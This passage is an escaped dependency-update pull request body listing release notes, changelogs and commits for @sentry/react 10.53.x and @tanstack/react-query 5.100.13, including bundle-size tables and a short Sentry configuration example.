notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/releases\"\u003e@​sentry/react's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eBundle size 📦\u003c/h2\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003ePath\u003c/th\u003e\n\u003cth\u003eSize\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.22 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e24.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e43.69 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing + Span Streaming)\u003c/td\u003e\n\u003ctd\u003e45.62 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Profiling)\u003c/td\u003e\n\u003ctd\u003e48.56 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.4 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay) - with treeshaking flags\u003c/td\u003e\n\u003ctd\u003e72.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay with Canvas)\u003c/td\u003e\n\u003ctd\u003e86.99 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e99.33 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Feedback)\u003c/td\u003e\n\u003ctd\u003e43 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. sendFeedback)\u003c/td\u003e\n\u003ctd\u003e30.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. FeedbackAsync)\u003c/td\u003e\n\u003ctd\u003e35.91 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics)\u003c/td\u003e\n\u003ctd\u003e27.27 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Logs)\u003c/td\u003e\n\u003ctd\u003e27.42 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/browser\u003c/code\u003e (incl. Metrics \u0026amp; Logs)\u003c/td\u003e\n\u003ctd\u003e28.08 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e27.92 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/react\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.9 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e31.01 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/vue\u003c/code\u003e (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e45.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ccode\u003e@​sentry/svelte\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e26.24 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle\u003c/td\u003e\n\u003ctd\u003e28.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing)\u003c/td\u003e\n\u003ctd\u003e46.04 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e29.89 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e47.14 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e68.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay)\u003c/td\u003e\n\u003ctd\u003e82.55 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e83.6 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback)\u003c/td\u003e\n\u003ctd\u003e88.23 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Replay, Feedback, Logs, Metrics)\u003c/td\u003e\n\u003ctd\u003e89.3 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle - uncompressed\u003c/td\u003e\n\u003ctd\u003e83.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing) - uncompressed\u003c/td\u003e\n\u003ctd\u003e138.12 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e88.07 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Tracing, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e141.5 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003eCDN Bundle (incl. Replay, Logs, Metrics) - uncompressed\u003c/td\u003e\n\u003ctd\u003e209.97 KB\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/blob/develop/CHANGELOG.md\"\u003e@​sentry/react's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/test-applications/nextjs-15-intl (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20821\"\u003e#20821\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e10.53.0\u003c/h2\u003e\n\u003ch3\u003eImportant Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003efeat(core): Add \u003ccode\u003estreamGenAiSpans\u003c/code\u003e options to stream gen_ai spans (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20785\"\u003e#20785\u003c/a\u003e)\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAdds a new \u003ccode\u003estreamGenAiSpans\u003c/code\u003e option that controls how \u003ccode\u003egen_ai\u003c/code\u003e spans are\nsent to Sentry. When set, the SDK extracts all \u003ccode\u003egen_ai\u003c/code\u003e spans out of a\ntransaction and sends them as v2 envelope items.\u003c/p\u003e\n\u003cp\u003eEnable this option if gen_ai spans are being dropped because the transaction payload exceeds size limits.\u003c/p\u003e\n\u003cpre lang=\"ts\"\u003e\u003ccode\u003eSentry.init({\n  dsn: 'https://examplePublicKey@o0.ingest.sentry.io/0',\n  streamGenAiSpans: true,\n});\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(browser): Migrate browser profiling thread data to span attributes (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20800\"\u003e#20800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eaddConsoleInstrumentationFilter\u003c/code\u003e utility (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20790\"\u003e#20790\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): Add \u003ccode\u003eapplicationKey\u003c/code\u003e to \u003ccode\u003eBuildTimeOptionsBase\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20789\"\u003e#20789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(core): split exports by browser/server for bundle size (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20435\"\u003e#20435\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(nextjs): Add top-level \u003ccode\u003eapplicationKey\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20794\"\u003e#20794\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(node): Support Node 26 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20710\"\u003e#20710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(profiling-node): Bump \u003ccode\u003e@sentry-internal/node-cpu-profiler\u003c/code\u003e to 2.4.0 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20720\"\u003e#20720\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(cloudflare): avoid flush lock self-wait (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20719\"\u003e#20719\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(hono): Capture transaction name on request for correct culprit (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20801\"\u003e#20801\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(mcp): retroactively wrap handlers registered before wrapMcpServerWithSentry (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20699\"\u003e#20699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(node-core): Guard against undefined util.getSystemErrorMap (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20660\"\u003e#20660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(replay): Capture aborted/errored fetch requests in replay network tab (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20722\"\u003e#20722\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/cd9740818cba748dbced0e8a1497000a88ec8a56\"\u003e\u003ccode\u003ecd97408\u003c/code\u003e\u003c/a\u003e release: 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/66cfb25117ed7b14ca3da20a79b836619e9c8a6c\"\u003e\u003ccode\u003e66cfb25\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20838\"\u003e#20838\u003c/a\u003e from getsentry/prepare-release/10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/df8fd3863043f143961a5d96e79a717d62eada31\"\u003e\u003ccode\u003edf8fd38\u003c/code\u003e\u003c/a\u003e meta(changelog): Update changelog for 10.53.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/588100986580e0f5c8c3204661e59e5103e7d269\"\u003e\u003ccode\u003e5881009\u003c/code\u003e\u003c/a\u003e fix(core): Include subpath type shims in published package (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20835\"\u003e#20835\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/6a7d179ad38c7591021c88e4bd3ec82b3c6cc606\"\u003e\u003ccode\u003e6a7d179\u003c/code\u003e\u003c/a\u003e fix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/ad47c3c3de5b2bacfbbd08bcdf9cd90184ce64bc\"\u003e\u003ccode\u003ead47c3c\u003c/code\u003e\u003c/a\u003e ref(hono): Consolidate route patching and add clarification comments (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20829\"\u003e#20829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/28d6fe514d5ed00561a8e3d1c0406a8cb544c738\"\u003e\u003ccode\u003e28d6fe5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/issues/20826\"\u003e#20826\u003c/a\u003e from getsentry/master\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/46aca45a868d717939448ded1001fac4337ac46e\"\u003e\u003ccode\u003e46aca45\u003c/code\u003e\u003c/a\u003e Merge branch 'release/10.53.0'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/b5cbc9ca1800e1b4ee1de66e135a90891cecd570\"\u003e\u003ccode\u003eb5cbc9c\u003c/code\u003e\u003c/a\u003e chore(deps): Bump next from 15.5.15 to 15.5.18 in /dev-packages/e2e-tests/tes...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-javascript/commit/05489b83e7920fc4ce47a530054c5558c1704a45\"\u003e\u003ccode\u003e05489b8\u003c/code\u003e\u003c/a\u003e release: 10.53.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-javascript/compare/10.51.0...10.53.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@tanstack/react-query` from 5.100.9 to 5.100.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TanStack/query/releases\"\u003e@​tanstack/react-query's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-next-experimental\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-persist-client\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-persist-client-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/TanStack/query/commit/d423168f6261a5cb3d353e53b27c8150cc271151\"\u003e\u003ccode\u003ed423168\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-devtools\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-next-experimental\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query-persist-client\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-persist-client-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​tanstack/react-query\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TanStack/query/blob/main/packages/react-query/CHANGELOG.md\"\u003e@​tanstack/react-query's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.100.13\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/TanStack/query/commit/d423168f6261a5cb3d353e53b27c8150cc271151\"\u003e\u003ccode\u003ed423168\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.13\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.100.12\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.12\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.100.11\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.11\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.100.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies []:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​tanstack/query-core\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.100.10\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/05cf2bc0a4eae64959dc8a40152e2878190c971b\"\u003e\u003ccode\u003e05cf2bc\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10758\"\u003e#10758\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/d423168f6261a5cb3d353e53b27c8150cc271151\"\u003e\u003ccode\u003ed423168\u003c/code\u003e\u003c/a\u003e fix(query-core): use built-in NoInfer for generic indexed-access types (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10593\"\u003e#10593\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/5ff4f6936bb66a64267eb4413430f956eecf7248\"\u003e\u003ccode\u003e5ff4f69\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10755\"\u003e#10755\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/3e85350749751eef055fffb65f6838dfafa74891\"\u003e\u003ccode\u003e3e85350\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10706\"\u003e#10706\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/9d2692cec4d538c2f96489027ba546f11638dfb1\"\u003e\u003ccode\u003e9d2692c\u003c/code\u003e\u003c/a\u003e ci: Version Packages (\u003ca href=\"https://github.com/TanStack/query/tree/HEAD/packages/react-query/issues/10695\"\u003e#10695\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TanStack/query/commit/74fa05eb1b16f40ea7068afd0e5e082687d22338\"\u003e\u003ccode\u003e74fa05e\u003c/code\u003e\u003c/a\u003e chore(tsconfig.json): narrow 'include' pattern to prevent TS6053 race conditi...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca 